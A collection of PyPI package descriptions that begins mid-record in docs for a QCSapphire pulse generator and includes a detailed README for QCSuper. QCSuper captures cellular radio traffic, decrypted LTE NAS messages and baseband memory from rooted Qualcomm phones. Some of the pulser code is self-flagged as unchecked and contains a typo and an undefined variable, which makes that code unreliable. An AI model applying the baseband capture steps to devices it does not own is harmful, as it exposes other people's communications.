Example: Single ChannelIn the simple case, we just have a single channel ('B') that we wish to use to\ngenerate a square wave. The documentation is straight-forward here. NB: channel\n'B' is demonstrated here because we use channel 'A' to control the optical\npumping in other experiments (pulsed-ODMR, Rabi, etc.).total_width=10e-6#in secondspulser.system.period(total_width)#use channel B for RF switch and use 'normal' modechannel=pulser.channel('B')channel.mode('normal')#create a 5 microsecond pulse#round to nearest 10ns bc QCSapphire does not behave well with machine errorschannel.width(np.round(total_width/2,8))channel.delay(0)pulser.system.state(1)#start the pulserRealistic Example: Adding Clock and Trigger ChannelsIn order to take robust data, however, we need to control our data acquisition\nsystem (DAQ). Supplying an external clock and trigger signal from the QCSapphire ensures\nthat the DAQ and pulser do not drift from each other and data is acquired at the\nexact moment the system is ready.However, this changes how we must program the RF on/off to be 5 microseconds in\nwidth. The following steps through the necessary calls to produce a200 ns clock period5 microsecond on/off RF pulsesingle trigger pulse at the start of every 10 microsecond periodFirst the ClockIn this example, channel ('C') is programmed to act as the clock. The\npulser system clock period is set to the smallest allowed value in order to\nset our clock tick leading edge period to 200 ns.\nThis channel is programmed exactly as the simple case above with a smaller width.clock_period=200e-9pulser.system.period(clock_period)channel=pulser.channel('C')channel.mode('normal')channel.width(np.round(clock_period/2,8))#100 ns wide square wavechannel.delay(0)Add RF switchA 5 microsecond wide pulse (positive), followed by\n5 microseconds off on channel B is implemented using the duty-cycle mode.\nIn the duty-cycle mode, we specify the number ofclock_periodsON we wish for the\nchannel to generate a signal we describe. We then specify how manyclock_periodsOFF until the pattern repeats. In this case channel B is programmed to output\na 5 microsecond wide pulse ONE time and then wait the appropriate number ofclock_periodssuch that the start of the next 5 microsecond wide pulse occurs\n10 microseconds later. Thus, the OFF duty cycle will be10 mu*s / clock_period - 1rf_pulse_width=5e-6full_pulse_sequence_period=2*rf_pulse_widthn_on_cycles=1n_off_cycles=np.round(full_cycle_width/clock_period).astype(int)-n_on_cycleschannel=pulser.channel('B')channel.mode('dcycle')channel.width(np.round(rf_pulse_width,8))#5 mu*s wide square wavechannel.delay(0)channel.pcounter(n_on_cycles)channel.ocounter(n_off_cycles)When data are acquired, the first 5 microseconds will be the 'signal' where\nwe expect a dip in PL, and the second 5 microseconds will be the 'background'\nwhere no RF signal is present and we expect full PL intensity.Add TriggerWe now want to produce a single square wave output on channel D at the beginning of\neach 10 microsecond period. This will be used to trigger our DAQ. Again, we\nuse the duty cycle mode.trigger_width=100e-9n_on_cycles=1n_off_cycles=np.round(full_pulse_sequence_period/clock_period).astype(int)-n_on_cycleschannel=pulser.channel('D')channel.mode('dcycle')channel.width(np.round(trigger_width,8))#100 ns wide square wavechannel.delay(0)channel.pcounter(n_on_cycles)channel.ocounter(n_off_cycles)Set the Channel StatesWe finally set the states of the channels and system to start the sequence.pulser.channel('B').state(1)pulser.channel('C').state(1)pulser.channel('D').state(1)pulser.system.state(1)Rabi Oscillation / pulsed-ODRM ProgrammingIn pulsed-ODMR, one separates the optical pumping from the application of\nthe RF magnetic field signal. In a Rabi oscillation experiment, the\nwidth of the RF signal is varied as the PL contrast to background is measured.\nBoth of these pulse sequences are similar to each other and both are more complicated than the example\nabove.The main difference between the CWODMR pulses above and Rabi/pulse-ODMR sequences is\nthat an appropriate delay to RF pulse is added and channel A is used to\ncontrol the optical pump/readout. The RF pulse must come after the initial optical pump.The full sequence is an optical pump signal (~5 microseconds), followed by an RF\nsignal of some duration, followed by an optical readout (~5 microseconds),\nfollowed by some period with no RF or optical pump. A description of this sequence, though done\nwith a lock-in amplifier, is foundhere.However, the duty-cycle mode is used. The RF channel (B) is programmed to generate\na delayed signal, of some width, ONE time, and then wait M clock cycles before\nthe next signal, where M =full_pulse_sequence_period / clock_period - 1.An example of this sequence is found in theQT3 lab experimental code.Additionally, as can be seen in the code above, some extra delay after the optical\npump was added because of a finite hardware response time of ~700-900 ns.Trigger Pulses on Channel A via Software TriggerHere's an example of using an external trigger to generate an output pulse from\nthe QCSapphire. This may be very useful when used in combination with a\ndevice that has more output channels and more sophisticated pulse sequeunce\nprogramming, such as the Spin Core Pulse Blaster. One of the Pulse Blaster's\noutput channels could be used to trigger the external trigger channel of the QCSapphire.One reason to do this would be to utilize QCSapphire's superior pulse width\nresolution. The smallest square wave from the Pulse Blaster is 50 ns, while\nthe QCSapphire can produce a 10 ns wide pulse (according to its documentation)### TODO -- check this code! It doesn't look right.pulser.channel('A').mode('single')#pulser.channel('A').cmode('single') #do we need cmode instead of mode?pulser.channel('A').period(0.2)#200 ms system pulsepulser.channel('A').external.mode('trigger')pulser.channel('A').width(10e-9)#10 ns wide pulse#pulser.channel('B').cmode('single')#pulser.channel('B').polarity('normal')#pulser.channel('B').width(10e-9) #10 ns wide pulse#pulser.channel('B').state(0)pulser.channel('A').state(0)#trigger loop example#wait N seconds between triggerswait_N=5.0N_pulses=50#activate pulser and output channelpulser.channel('A').state(1)#pulser.channel('B').state(1)foriinrange(N_pulses):pulser.software_trigger()#trigger the pulsertime.sleep(wait_N)#deactivatepulser.channel('A').state(0)#pulser.channel('B').state(0)DebuggingIf you hit an error, especially when trying to use the property-like calls,\nthe last string written to the Serial port is found in the.last_write_commandattribute of the pulser object.pulser.channle('B').width(25e-6)print(pulser.last_write_command)# ':PULSE1:WIDTH 2.5e-05'Additionally, you can see the recent command history of the object (last 1000 commands)forcommandinpulser.command_history():print(command)LICENSELICENCEAcknowledgmentsThePropertyclass of this code was taken fromeasy-scpi:https://github.com/bicarlsen/easy-scpiand modified."} +{"package": "qcSim", "pacakge-description": "qcSim is a Python package for the simulation of quantum computers based on the\nquantum circuit model.\nThe goal of this simulator is to provide a simple and understandable syntax that allows\neven people who have only recently started working with quantum computing to implement\nsimple quantum algorithms. This rather practical component should make it easier for\nbeginners to understand the complex topic of quantum computing.\nThe simulator was primarily programmed to implement quantum machine learning and quantum\noptimization subroutines. Some examples can be found in the folder \u201cexample subroutines\u201d.\nThe focus was to clearly show the lower time complexity of quantum algorithms compared\nto their classical counterparts."} +{"package": "qcs-phy", "pacakge-description": "QCS is an open-source Python code that allows to study the single-photon transmission and reflection, as well as the nth-order equal-time correlation functions (ETCFs) in driven-dissipative quantum systems."} +{"package": "qcs-sdk-python", "pacakge-description": "QCS SDK Python\u26a0\ufe0f In Developmentqcs-sdk-pythonprovides an interface to RigettiQuantum Cloud Services(QCS), allowing users\nto compile and run Quil programs on Rigetti quantum processors. Internally, it is powered by theQCS Rust SDK.While this package can be used directly,pyQuiloffers more functionality and a\nhigher-level interface for building and executing Quil programs. This package is still in early development and breaking changes should be expected between minor versions.DocumentationDocumentation for the current release ofqcs_sdkis publishedhere. Every version ofqcs_sdkshipswith type stubsthat can provide type hints and documentation to Python tooling and editors.TroubleshootingEnabling Debug loggingThis package integrates with Python'slogging facilitythrough a Rust crate calledpyo3_log. The quickest way to get started is to just enable debug logging:importlogginglogging.basicConfig(level=logging.DEBUG)Because this is implemented with Rust, there are some important differences in regards to log levels and filtering.TheTRACElog levelRust has aTRACElog level that doesn't exist in Python. It is less severe thanDEBUGand is set to a value of 5. While theDEBUGlevel is recommended for troubleshooting, you can choose to targetTRACElevel logs and below like so:importlogginglogging.basicConfig(level=5)Runtime Configuration and Cachingpyo3_logcaches loggers and their level filters to improve performance. This means that logger re-configuration done at runtime may cause unexpected logging behavior in certain situations. If this is a concern,this section of the pyo3_log documentationgoes into more detail.These caches can be reset using the following:qcs_sdk.reset_logging()This will allow the logging handlers to pick up the most recently-applied configuration from the Python side.Filtering LogsBecause the logs are emitted from a Rust library, the logger names will correspond to the fully qualified path of the Rust module in the library where the log occurred. These fully qualified paths all have their own logger, and have to be configured individually.For example, say you wanted to disable the following log:DEBUG:hyper.proto.h1.io:flushed 124 bytesYou could get the logger forhyper.proto.h1.ioand disable it like so:logging.getLogger(\"hyper.proto.h1.io\").disabled=TrueThis can become cumbersome, since there are a handful of libraries all logging from a handful of modules that you may not be concerned with. A less cumbersome, but more heavy handed approach is to apply a filter to all logging handlers at runtime. For example, if you only cared about logs from aqcslibrary, you could setup a log filter like so:classQCSLogFilter(logging.Filter):deffilter(self,record)->bool:return\"qcs\"inrecord.nameforhandlerinlogging.root.handlers:handler.addFilter(QCSLogFilter())This applies to all logs, so you may want to tune thefiltermethod to include other logs you care about. See the caching section above for important information about the application of these filters."} +{"package": "qc.statusmessage", "pacakge-description": "IntroductionSometimes in web application development the need arises to show a status message\nor similar notices to a user. This can of course be easily done in some success page\nbut sometimes this page is rendered by a different request because of a redirect.\nIn these cases you can use some query parameters or similar methods but that\u2019s not\nalways easy to use or might even have security problems.qc.statusmessagetries to solve this problem by giving you aMessageListobject\nwhich is put into the WSGI environment on ingress and processed on egress to store a list of\nmessages inside a cookie.For information on how to use it check out theonline documentationor\ncheck out thesource code repository.ChangelogNext release1.0b3 - July 20th 2009Bugfixesfixed link to PyPI package in documentation [cs]fixed handling of broken cookies [cs]1.0b1 - March 15th 2009Initial release"} +{"package": "qcSubroutines", "pacakge-description": "qcSubroutines is a Python package containing some quantum subroutines.\nCombined with qcSim, a tool for the simulation of quantum computers, these subroutines can be used to build quantum algorithms."} +{"package": "qcsuper", "pacakge-description": "QCSuperQCSuperis a tool communicating with Qualcomm-based phones and modems, allowing tocapture raw 2G/3G/4G(and for certain models 5G) radio frames, among other things.It will allow you togenerate PCAPcaptures of it using either a rooted Android phone, an USB dongle or an existing capture in another format.After havinginstalledit, you can plug your rooted phone in USB and using it, with a compatible device, is as simple as:./qcsuper.py --adb --wireshark-liveOr, if you have manually enabled exposing a Diag port over your phone (the corresponding procedure may vary depending on your phone modem and manufacturer, see below for more explanations), or if you have plugged a mobile broadband dongle:./qcsuper.py --usb-modem auto --wireshark-liveIt uses the Qualcomm Diag protocol, also called QCDM or DM (Diagnostic Monitor) in order to communicate with your phone's baseband.You are willing to report that your device works or does not work? You can open aGithub issue.Table of contentsInstallationUbuntu and Debian installationWindows installationSupported protocolsUsage noticeAnnexes:Using QCSuper with an USB modemSupported devicesRelated tools using the Diag protocolBlog post/demo:Presenting QCSuper: a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phonesMore documentation:The Diag protocolQCSuper architectureInstallationQCSuper was lately tested and developed on Ubuntu LTS 22.04 and also has been used over Windows 11. It depends on a few Python modules. It is advised to use Linux for better compatibility.To use it, your phone must be rooted or expose a diag service port over USB. In order to check for compatibility with your phone, look up the phone's model on a site likeGSMArenaand check whether it has a Qualcomm processor.In order to open PCAP files produced by QCSuper, you can use any Wireshark 2.x - 4.x for 2G/3G frames, but you need at least Wireshark 2.5.x for 4G frames (and 2.6.x for individual NAS messages decrypted out of 4G frames). Ubuntu currently provides a recent enough build for all versions.Decoding 5G frames was tested under Wireshark 3.6.x and will be done through automatically installing a Wireshark Lua plug-in (in%APPDATA%\\Wireshark\\pluginsunder Windows or in~/.local/lib/wireshark/pluginsunder Linux and macOS), which can be avoided through setting theDONT_INSTALL_WIRESHARK_PLUGIN=1environment variable if you are willing to avoid this.Ubuntu and Debian installationIn order to install the stable version of QCSuper system-wide from PyPI, you can run these commands:# Install dependenciessudoaptinstallpython3-pipwireshark# Install stable QCSuper system-widesudopip3install--upgradeqcsuperThen, you can just typeqcsuperin your terminal to run QCSuper. (Use this anywhere in place of where./qcsuper.pyis written below.)In order to install the development version in a specific folder, open a terminal and type the following:# Download QCSupergitclonehttps://github.com/P1sec/QCSuper.gitqcsupercdqcsuper# Install dependenciessudoaptinstallpython3-pipwireshark\nsudopip3install--upgradepyserialpyusbcrcmodhttps://github.com/P1sec/pycrate/archive/master.zipThen, run QCSuper from theqcsuper/directory, using the./qcsuper.pycommand in the terminal.Windows installationQCSuper can run on Windows, but you should beforehand ensure that Google's ADB prompt correctly runs on your machine with your device, and you should as well manually createlibusb-win32filters (through the utility accessible in the Start Menu after installing it) in the case where your device directly needs to connect to the Diag port over pseudo-serial USB.(Please note that if you mode-switch your device, the associated USB PID/VID may change and it may require to redo driver associations in thelibusb-win32filter creation utility - and/or in the Windows peripherial devices manager depending on the case)On Windows, you may need (in addition to Google's ADB kernel drivers) to download and install your phone's USB drivers from your phone model (this may include generic Qualcomm USB drivers). Please search for your phone's model + \"USB driver\" or \"ADB driver\" on Google for instructions.Then, you need to ensure that you can reach your device usingadb. You can find a tutorial on how to download and setupadbhere. Theadb.exe shell(or whatever executable path you use, a copy of the ADB executable is present in theqcsuper/inputs/external/adbfolder of QCSuper) command must display a prompt to continue.Then, follow these links (the tool has been tested lately on Windows 11 - it is not guaranteed to work on Windows 7) in order to:Install Python 3.12(Windows 7 version:Python 3.7) or more recent (be sure to check options to include it into PATH, install it for all users and install pip)Install Wireshark 4.2(Windows 7 version:Install Wireshark 3.6) or more recentInstall libusb-win32 1.2.7.3(Windows 7 version:libusb-win32 1.2.3.7) or more recentRestart your command prompt/terminal in order to ensure that the%PATH%system variable has been updated.Download and extract QCSuperTo install the required Python modules, open your command prompt and type:pip3install--upgradepyserialpyusbcrcmodhttps://github.com/P1sec/pycrate/archive/master.ziphttps://github.com/pyocd/libusb-package/archive/master.zipStill in your command prompt, move to the directory containing QCSuper using thecdcommand. You can then execute commands (which should start withpy qcsuper.pyorpy3 qcsuper.pyif you installed Python 3 from the online installer, orpython3.exe .\\qcsuper.pyif you installed it from the Windows Store).As noted above, it is possible that you have to add alibusb-win32filter through the utility available in the Start Menu in order to ensure that the interface corresponding to the Diag port is visible by QCSuper on the mode-switched device (a first failed attempt to run the tool using the--adbflag should trigger a mode-switch if the ADB driver is working and the device is correctly rooted).Supported protocolsQCSuper supports capturing a handful of mobile radio protocols. These protocols are put after aGSMTAP header, a standard header (encapsulated into UDP/IP) permitting to identify the protocol, and GSMTAP packets are put into aPCAP filethat is fully analyzable using Wireshark.2G/3G/4G protocols can be broken into a few \"layers\": layer 1 is about the digital radio modulation and multiplexing, layer 2 handles stuff like fragmentation and acknowledgement, layer 3 is the proper signalling or user data.QCSuper allows you most often to capture on layer 3, as it is the most pratical to analyze using Wireshark, and is what the Diag protocol provides natively (and some interesting information is here).2G (GSM): Layer 3 and upwards (RR/...)2.5G (GPRS and EDGE): Layer 2 and upwards (MAC-RLC/...) for data acknowledgements3G (UMTS): Layer 3 and upwards (RRC/...)Additionally, it supports reassembling SIBs (System Information Blocks, the data broadcast to all users) in separate GSMTAP frames, as Wireshark currently can't do it itself: flag--reassemble-sibs4G (LTE): Layer 3 and upwards (RRC/...)Additionally, it supports putting decrypted NAS message, which are embedded encrypted embedded into RRC packet, in additional frames: flag--decrypt-nasBy default, the IP traffic sent by your device is not included, you see only the signalling frames. You can include the IP traffic you generate using the--include-ip-trafficoption (IP being barely the layer 3 for your data traffic in 2G/3G/4G, at the detail that its headers may be compressed (ROHC) and a tiny PPP header may be included).The data traffic you send uses a channel different from the signalling traffic, this channed is setup through the signalling traffic; QCSuper should thus show you all details relevant to how this channel is initiated.Usage noticeIn order to use QCSuper, you specify one input (e.g:--adb(Android phone),--usb-modem) and one or more modules (--wireshark-livefor opening Wireshark,--pcap-dumpfor writing traffic to a PCAP file,--infofor generic information about the device...).A few commands you can type are:# Open Wireshark directly, using a rooted Android phone as an input,# for compatible phones:$./qcsuper.py--adb--wireshark-live# Same, but dump to a PCAP file instead of opening Wireshark directly$./qcsuper.py--adb--pcap-dump/tmp/my_pcap.pcapOr, if it is not simple enough to work:# Same, but using an USB modem/phone exposing a Diag serial port# directly over USB, in the case where the \"--adb\" mode does not# work directly:# - With a compatible Android phone where the Diag port over USB has# been manually enabled by the user (see the \"How to manually enable# the diagnostic ports on my phone\" section below for a summary of# how this may be possible with most Qualcomm-based models)## In this case, you may try:./qcsuper.py--usb-modemauto--wireshark-live# Or, if selecting manually the USB device corresponding to the# Diag-enabled phone turns to be requried:$lsusb(..)Bus001Device076:ID05c6:9091Qualcomm,Inc.IntexAquaFish&JollaCDiagnosticMode\n$./qcsuper.py--usb-modem1d6b:0003--wireshark-live# With vendor ID:product ID...$./qcsuper.py--usb-modem002:001--wireshark-live# ...or with bus ID:device ID# Or, if selecting the configuration number and interface number (referred as \"bConfigurationValue\" and \"bInterfaceNumber\" in the USB desciprtors) turn to be required:$lsusb-v(..)$./qcsuper.py--usb-modem1d6b:0003:1:0--wireshark-live# With vendor ID:product ID:configuration:interface...$./qcsuper.py--usb-modem002:001:1:0--wireshark-live# ...or with bus ID:device ID:configuration:interface# - With a generic serial-over-USB device where the \"usbserial\" module has# loaded a /dev/ttyUSB{0-9} device corresponding to the diagnostic port:$sudo./qcsuper.py--usb-modem/dev/ttyUSB2--wireshark-live# - With an Option device where the \"hsoserial\" module has loaded a# /dev/ttyHS{0-9} device corresponding to the diagnostic port:$sudo./qcsuper.py--usb-modem/dev/ttyHS2--wireshark-liveHere is the current usage notice for QCSuper:usage: qcsuper.py [-h] [--cli] [--efs-shell] [-v] (--adb | --adb-wsl2 ADB_WSL2 | --usb-modem TTY_DEV | --dlf-read DLF_FILE | --json-geo-read JSON_FILE) [--info]\n [--pcap-dump PCAP_FILE] [--wireshark-live] [--memory-dump OUTPUT_DIR] [--dlf-dump DLF_FILE] [--json-geo-dump JSON_FILE] [--decoded-sibs-dump]\n [--reassemble-sibs] [--decrypt-nas] [--include-ip-traffic] [--start MEMORY_START] [--stop MEMORY_STOP]\n\nA tool for communicating with the Qualcomm DIAG protocol (also called QCDM or DM).\n\noptions:\n -h, --help show this help message and exit\n --cli Use a command prompt, allowing for interactive completion of commands.\n --efs-shell Spawn an interactive shell to navigate within the embedded filesystem (EFS) of the baseband device.\n -v, --verbose Add output for each received or sent Diag packet.\n\nInput mode:\n Choose an one least input mode for DIAG data.\n\n --adb Use a rooted Android phone with USB debugging enabled as input (requires adb).\n --adb-wsl2 ADB_WSL2 Unix path to the Windows adb executable. Equivalent of --adb command but with WSL2/Windows interoperability.\n --usb-modem TTY_DEV Use an USB modem exposing a DIAG pseudo-serial port through USB.\n Possible syntaxes:\n - \"auto\": Use the first device interface in the system found where the\n following criteria is matched, by order of preference:\n - bInterfaceClass=255/bInterfaceSubClass=255/bInterfaceProtocol=48/bNumEndpoints=2\n - bInterfaceClass=255/bInterfaceSubClass=255/bInterfaceProtocol=255/bNumEndpoints=2\n - usbserial or hso device name (Linux/macOS): \"/dev/tty{USB,HS,other}{0-9}\"\n - COM port identifier (Windows): \"COM{0-9}\"\n - \"vid:pid[:cfg:intf]\" (vendor ID/product ID/optional bConfigurationValue/optional\n bInterfaceNumber) format in hexa: e.g. \"05c6:9091\" or \"05c6:9091:1:0 (vid and pid\n are four zero-padded hex digits, cfg and intf are canonical values from the USB\n descriptor, or guessed using the criteria specified for \"auto\" above if not specified)\n - \"bus:addr[:cfg:intf]\" (USB bus/device address/optional bConfigurationValue/optional\n bInterfaceNumber) format in decimal: e.g \"001:003\" or \"001:003:0:3\" (bus and addr are\n three zero-padded digits, cfg and intf are canonical values from the USB descriptor)\n --dlf-read DLF_FILE Read a DLF file generated by QCSuper or QXDM, enabling interoperability with vendor software.\n --json-geo-read JSON_FILE\n Read a JSON file generated using --json-geo-dump.\n\nModules:\n Modules writing to a file will append when it already exists, and consider it Gzipped if their name contains \".gz\".\n\n --info Read generic information about the baseband device.\n --pcap-dump PCAP_FILE\n Generate a PCAP file containing GSMTAP frames for 2G/3G/4G, to be loaded using Wireshark.\n --wireshark-live Same as --pcap-dump, but directly spawn a Wireshark instance.\n --memory-dump OUTPUT_DIR\n Dump the memory of the device (may not or partially work with recent devices).\n --dlf-dump DLF_FILE Generate a DLF file to be loaded using QCSuper or QXDM, with network protocols logging.\n --json-geo-dump JSON_FILE\n Generate a JSON file containing both raw log frames and GPS coordinates, for further reprocessing. To be used in combination with --adb.\n --decoded-sibs-dump Print decoded SIBs to stdout (experimental, requires pycrate).\n\nPCAP generation options:\n To be used along with --pcap-dump or --wireshark-live.\n\n --reassemble-sibs Include reassembled UMTS SIBs as supplementary frames, also embedded fragmented in RRC frames.\n --decrypt-nas Include unencrypted LTE NAS as supplementary frames, also embedded ciphered in RRC frames.\n --include-ip-traffic Include unframed IP traffic from the UE.\n\nMemory dumping options:\n To be used along with --memory-dump.\n\n --start MEMORY_START Offset at which to start to dump memory (hex number), by default 00000000.\n --stop MEMORY_STOP Offset at which to stop to dump memory (hex number), by default ffffffff.Specifying-to pipe data from stdin or towards stdout is supported (gzipped content may not be detected).How to root my phone?This README file is not a guide over how to root your phone (getting your phone to enable you to run commands such as \"su\").In most of the recent Android devices, you must first use the \"OEM/bootloader unlock\" option prevent in the developer settings of the telephone in order to unlock the bootloader, then you may use a tool such asMagiskthat will enable you to obtain a patched image for your phone's bootloader, that you will then be able to load onto your phone infastbootmode.QCSuper will have more chance to work easily on your Qualcomm-based device when your phone is rooted, but there often are ways to enable the Qualcomm Diag USB mode (also known as \"DM\", Diag Monitor) on your phone without having your phone rooted. Thisdepends onyour phone vendor and goes through, for example, typing a magic combination of digits onto your phone's dialer keypad. Please see the \"How to manually enable the diagnostic ports on my phone?\" section below for more details.Before rooting your phone, remember that you may also want to use load an alternate recovery image such as TWRP onto your OEM-unlocked phone in order to perform partition backup using a tool such asTWRP(it may be as simple as loading the image through Fastboot, enabling the ADB link in the settings of TWRP, and usingadb pullonto selected partitions in the/dev/block/by-namefolder`).For specific inscriptions on rooting or enabling the Diag mode on your phone model, you may search the information over the XDA-developers forum with appropriate keywords.How to manually enable the diagnostic ports on my phone?On Qualcomm/MSM Android-based devicesbearing Linux kernel 4.9 or earlier(this includes roughly part of devices up to Android 12 and all devices before Android 10), Qualcomm-based Android devices normallycontain a system device called/dev/diagwhich allows to communicate data to the diagnostics port of the baseband.On Qualcomm/MSM Android-based devicesbearing Linux kernel 4.14 or later(this includes roughly part of devices from Android 10 and all devices from Android 13),/dev/diagdisappeared, as the correspondingdiagcharmodule is disabled by default recent AOSP/Linux kernels.On the devicesbearing a Linux 4.9 or earlier MSM kernel, when using the--adbflag, QCSuper willtry to connect through ADB automatically, will then attempt to transfer an executable utility connecting to the/dev/diagdevice, in order to launch it as root using a command such assu -c /data/local/tmp/adb_bridge, and subsequentlytransmit the diagnostics data with the device over TCP(also forwarding the corresponing TCP port through ADB).On the devicesbearing a Linux 4.14 or later MSM kernel, when using the--adbflag, QCSuper will try to connect through ADB automatically, will then attempt tomode-switch the USB portof the phone using a command such assu -c 'setprop sys.usb.config diag,adb', and then execute theequivalent of the--usb-modem autoflag(see below).The--usb-modem flag allows QCSuper toconnect to the Qualcomm diagnostics port over a pseudo-serial port over USB, independently from ADB, which is the most common way to connect to the Qualcomm diag protocol of an Android-based phone using an external device.In order to use--usb-modem flag, the Qualcomm diagnostic port must be enabled on the corresponding phone, otherwise saidthe phone should have been USB mode-switchedbeforehand.The most common way to USB mode-switch your device is to execute a command such assetprop sys.usb.config diag,adbas root, but there may be other ways (with certain phone vendors) to enable the Qualcomm diagnostics-over-USB mode, see for examplethis pagefor possible ways, for certain devices, to enable Diag without root - it often imples to type a magic combination of digits over the phone's dialer keypad.In other devices, it may also be possible to use an APK file signed by the phone vendor and with System-related permissions in order to enable the Diag mode without rooting (search about thecom.longcheertel.midtestAPK for Xiaomi-based devices for example).Once your device has been correctly most-switched, running thegetprop sys.usb.configcommand over ADB should display a text string containingdiag.On the side of your computer, then, runninglsusb(on Linux) should display a line referring your device, for example:Bus 001 Device 076: ID 05c6:9091 Qualcomm, Inc. Intex Aqua Fish & Jolla C Diagnostic ModeNote the001:076(bus index/device index identifier), and the05c6:9091(vendor ID/product ID) information present in this output.Once you have this information available,you may try to use a flag such as--usb-modem 05c6:9091or--usb-modem 001:076with QCSuper (please respect the digit padding).If this isn't conclusive, you may use thelsusb -v -d 05c6:9091command, which should produce detailed output, including the USB configurations, interfaces and endpoints for the corresponding USB device:Bus 001 Device 027: ID 05c6:9091 Qualcomm, Inc. Intex Aqua Fish & Jolla C Diagnostic Mode\nDevice Descriptor:\n bLength 18\n bDescriptorType 1\n bcdUSB 2.01\n bDeviceClass 0 \n bDeviceSubClass 0 \n bDeviceProtocol 0 \n bMaxPacketSize0 64\n idVendor 0x05c6 Qualcomm, Inc.\n idProduct 0x9091 Intex Aqua Fish & Jolla C Diagnostic Mode\n bcdDevice 5.04\n iManufacturer 1 Xiaomi\n iProduct 2 Mi 11\n iSerial 3 d94f4341\n bNumConfigurations 1\n Configuration Descriptor:\n bLength 9\n bDescriptorType 2\n wTotalLength 0x0086\n bNumInterfaces 4\n bConfigurationValue 1\n iConfiguration 4 Default composition\n bmAttributes 0x80\n (Bus Powered)\n MaxPower 500mA\n Interface Descriptor:\n bLength 9\n bDescriptorType 4\n bInterfaceNumber 0\n bAlternateSetting 0\n bNumEndpoints 2\n bInterfaceClass 255 Vendor Specific Class\n bInterfaceSubClass 255 Vendor Specific Subclass\n bInterfaceProtocol 48 \n iInterface 0 \n[...]QCSuper allows you to manually select the identifiers of the configuration and the interface you are wishing to attempt to connect to on the concerned device (designated asbConfigurationValueandbInterfaceNumberin the raw USB descriptor), in the case where it isn't detected correctly. For example, the--usb-modem 05c6:9091:1:0flag will select respectively configuration 1 and the interface 0 on the concerned device.--usb-modem 05c6:9091:1:4will select the interface 4 over the configuration 1.If the configuration and interface indexes detail isn't specified, it will select the first interface descriptor on the system USB bus which is found to match the following criteria, by order of preference:bInterfaceClass=255/bInterfaceSubClass=255/bInterfaceProtocol=48/bNumEndpoints=2bInterfaceClass=255/bInterfaceSubClass=255/bInterfaceProtocol=255/bNumEndpoints=2When using the--usb-modem autoflag, the first device exposing an USB interface compilant with this criteria is picked, and if needed on Linux the underlying/dev/ttyUSB*(usbserialmodule) or/dev/ttyHS*(hsomodule) character device is selected, in the case where the device has been detected and mounted by a kernel module (see the \"Using QCSuper with an USB modem\" section below).Alternately, on Linux, it may also be possible to manually create/dev/ttyUSB*endpoints corresponding to the interfaces of a given USB device, that you will able to can connect using QCSuper with a flag such as--usb-modem /dev/ttyUSB0(this may require running QCSuper with root rights), using theusbserialmodule. For this, you can use a command such as:sudo rmmod usbserial\nsudo modprobe usbserial vendor=0x05c6 product=0x9091Using QCSuper with an USB modemYou can use QCSuper with an USB modem exposing a Diag port using the--usb-modem option, whereis the name of the pseudo-serial device on Linux (such as/dev/ttyUSB0,/dev/ttyHS2and other possibilites) or of the COM port on Windows (such asCOM2,COM3).Please note that in most setups, you will need to run QCSuper as root in order to be able to use this mode, notably for handling serial port interference.If you don't know which devices under/devexpose the Diag port, you may have to try multiple of these. You can try to auto-detect it by stopping the ModemManager daemon (sudo systemctl stop ModemManager), and using the following command:sudo ModemManager --debug 2>&1 | grep -i 'port is QCDM-capable'then Ctrl-C.Please note that if you're not able to use your device with for example ModemManager in the first place, it is likely that it is not totally setup and that it will not work neither with QCSuper. A few possible gotchas are:You didn't apply the propermode switchingcommand for your device.If you bought a device that previously had a SIM from a different operator, your device may be sim-locked. You may have to use the unlock code from the former operator and submit it to the device, as if it was a PIN code:sudo mmcli -i 0 --pin=If your Qualcomm-based USB device doesn't expose a Diag port by default, you may need to type the following through the AT port in order to enable the Diag port:AT$QCDMGPlease note that only one client may communicate with the Diag port at the same time. This applies to two QCSuper instances, or QCSuper and ModemManager instances.If ModemManager is active on your system, QCSuper will attempt to dynamically add an udev rule to prevent it to access the Diag port and restart its daemon, as it's currently the best way to achieve this. It will suppress this rule when closed.Supported devicesQCSuper was successfully tested with:Sony Xperia Z (Phone) - 4G - works out of the box after rooting an enabling adbNexus 6P (Phone) - 4G - works out of the box after rooting an enabling adbZTE MF823 (USB Modem) - 4G - may require tomode-switch the device to CDC-WDM, set the device tofactory mode, then execute the AT command mentioned aboveZTE MF667 (USB Modem) - 3G, 2011 - should work out of the box (may require mode switching)Option Icon 225 (USB Modem) - 3G, 2008Novatel Ovation MC998D (USB Modem)ZTE WCDMA Technologies MSM MF110/MF627/MF636 (USB Modem)ZTE 403zt (USB Modem) - 4GOnePlus One and 3 (Phones)Andromax A16C3H (Phone)Samsung Galaxy S4 GT-I9505 (Phone)Is it however aiming to be compatible with the widest possible range of devices based on a Qualcomm chipset, for the capture part.Do no hesitate to report whether your device is successfully working or not through opening aGithub issue.Related tools using the Diag protocolThere are a few other open tools implementing bits of the Diag protocol, serving various purposes:ModemManager: the principal daemon enabling to use USB modems on Linux, implements bits of the Diag protocol (labelled as QCDM) in order to retrieve basic information about USB modem devices.SnoopSnitch(specificallygsm-parser): chiefly an Android application whose purpose is to detect potential attacks on the radio layer (IMSI catcher, fake BTS...). It also have a secondary feature to capture some signalling traffic to PCAP, which does not provide exactly the same thing as QCSuper (LTE traffic isn't encapsulated in GSMTAP for example, device support may be different).diag-parser: A Linux tool that derivates from the PCAP generation feature from SnoopSnitch, somewhat improved, designed to work with USB modems.MobileInsight: this Android application intends to parse all kinds of logs output by Qualcomm and Mediatek devices (not only those containing signalling information, but also proprietary debugging structures), and dumping these to a specific XML representation format. Does not provide user-facing PCAPs (but formerly used Wireshark as a backend for converting certain protocol information to XML).qcombbdbg: A debugger for the Qualcomm baseband setting up itself by hooking a Diag command, through using the Diag command that allows to write to memory, for the Option Icon 225 USB modem.OpenPST: A set of tools related to Qualcomm devices, including a GUI utility allowing, for example, to read data on the tiny embedded filesystem accessible through Diag (EFS).SCAT: A tool with similar GSMTAP generation abilities, taking as input a serial port, also supporting Samsung Exynos."} +{"package": "qcsv", "pacakge-description": "An API to read and analyze CSV files by inferring types for each column of\ndata.Currently, only int, float and string types are supported."} +{"package": "qc-syn", "pacakge-description": "Quantum Circuit Synthesis Environment for Reinforcement LearningThis project provides a quantum circuit synthesis environment for reinforcement learning. The environment is built on top of the Gymnasium framework.InstallationTo install the environment, you need to have Python and pip installed on your system. If you don't have them installed, you can download them from the official Python website.Once you have Python and pip installed, you can install the environment by running the following command in your terminal:pipinstallqc_synUsageTo create a new instance of the environment, you can use 